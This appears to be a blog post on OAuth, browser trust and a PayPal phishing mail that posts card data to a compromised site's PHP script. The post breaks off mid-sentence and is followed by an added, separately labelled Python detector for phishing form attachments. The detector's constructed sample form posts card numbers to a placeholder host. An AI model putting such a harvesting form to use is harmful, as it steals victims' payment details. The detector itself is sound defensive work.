Last night, Stuart and I were having a little argument about the merits of
OAuth and whether it is actually suitable for what we are using it for
(authenticating desktop applications to access a service), as I am not
particularly fond of it, and I was working on support for OAuth 1.0a. Stuart's
argument is that users trust the browser, that we need some piece of trust in
the system, and that OAuth provides it because it pretty much requires a
browser. But I don't really think users trust their browser (so many don't
even know what a browser is); what they trust is the site they're looking at.
The browser doesn't even exist to them. It's just an inherent part of the
system that you have to use. To most people it's The Internet, or the giant
blue e, or a compass. The browser has no real meaning to them. It's the place
they have to go to search for things and access information. And humans have
two very important attributes: they are both very prone to error and very
resilient. People will keep going to the web, despite all its problems with
poorly designed sites, crashing browsers, and broken plug-ins, because they
need to get at the information they're looking for. And they will very often
type their password in the wrong place, or mistake a phishing site for a real
site. No amount of code will fix this. And nothing that requires a human to do
something will guarantee security and authenticity. It will only create
annoyances that humans will optimize around.
As a specific example, I received a PayPal phishing mail in my inbox this
morning. It's a pretty nifty attempt at getting credit info, too. It includes
an HTML form attachment, which POSTs to a PHP script that was implanted on
http://ag-exchange.com/, presumably by compromising either Apache, PHP, or
some other module their server is using. It appears to be a simple script
which just reads the POST data and redirects the user to the PayPal About Us
page. The HTML form requires JavaScript and seems to have a little card number
validation method, to avoid collecting bad data. The mail was sent to my alias
on gnome.org, and apparently got sent by taking advantage of an SMTP relay
with a broken configuration. Of course, the SMTP server may also have been
compromised and just had its configuration changed to allow open relay, but I
suspect it was probably just open already. And that mail server belongs to
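As an added, defender-side illustration of the attachment described above (this is not code from the original post), the following Python script pulls every form action out of an HTML attachment and flags any form that would POST to a host outside the allowlist for the brand the page names. The sample attachment, the hostname it posts to, and the allowlist are all constructed for the example.

```python
"""Flag HTML attachments whose forms post outside the brand they imitate.

Added example, not from the original post. The sample attachment below is
constructed; the hostname it posts to is a placeholder, not a real site.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: an HTML "form attachment" of the kind a phishing
# mail carries. The action host is a placeholder.
SAMPLE_ATTACHMENT = """
<html><body>
<h1>PayPal account verification</h1>
<form method="post" action="http://compromised.example/verify.php" onsubmit="return check()">
  Card number: <input name="cardnumber">
  Expiry: <input name="exp">
  <input type="submit" value="Confirm">
</form>
</body></html>
"""

# Hostnames a genuine form for each brand would be allowed to post to.
# Constructed allowlist for the example; a real deployment would load it
# from configuration.
BRAND_HOSTS = {"paypal": {"paypal.com", "www.paypal.com"}}


class FormActionParser(HTMLParser):
    """Collect the method and action of every <form> in the document."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            attrs = dict(attrs)
            self.forms.append({
                "method": (attrs.get("method") or "get").lower(),
                "action": attrs.get("action") or "",
            })


def host_matches(host, allowed):
    """True if host is one of the allowed names or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in allowed)


def find_suspicious_forms(html, brand):
    """Return forms that submit to a host outside the brand's allowlist.

    A form with no action or a relative action would post back to the
    attachment itself, which sends nothing anywhere, so it is not flagged.
    """
    parser = FormActionParser()
    parser.feed(html)
    allowed = BRAND_HOSTS.get(brand, set())
    flagged = []
    for form in parser.forms:
        url = urlparse(form["action"])
        if not url.netloc:
            continue
        if not host_matches(url.hostname or "", allowed):
            flagged.append({**form, "host": url.hostname})
    return flagged


def guess_brand(html):
    """Crude brand guess: the first allowlisted brand named in the text."""
    lower = html.lower()
    for brand in BRAND_HOSTS:
        if brand in lower:
            return brand
    return None


if __name__ == "__main__":
    brand = guess_brand(SAMPLE_ATTACHMENT)
    for form in find_suspicious_forms(SAMPLE_ATTACHMENT, brand):
        print(f"form claiming {brand!r} {form['method'].upper()}s to {form['host']}")
```

The check deliberately keys on where the data goes rather than on what the page looks like, since the visible branding is exactly the part a phisher copies faithfully; a form that names one brand and posts to an unrelated host is the signal worth surfacing to whoever triages mail attachments.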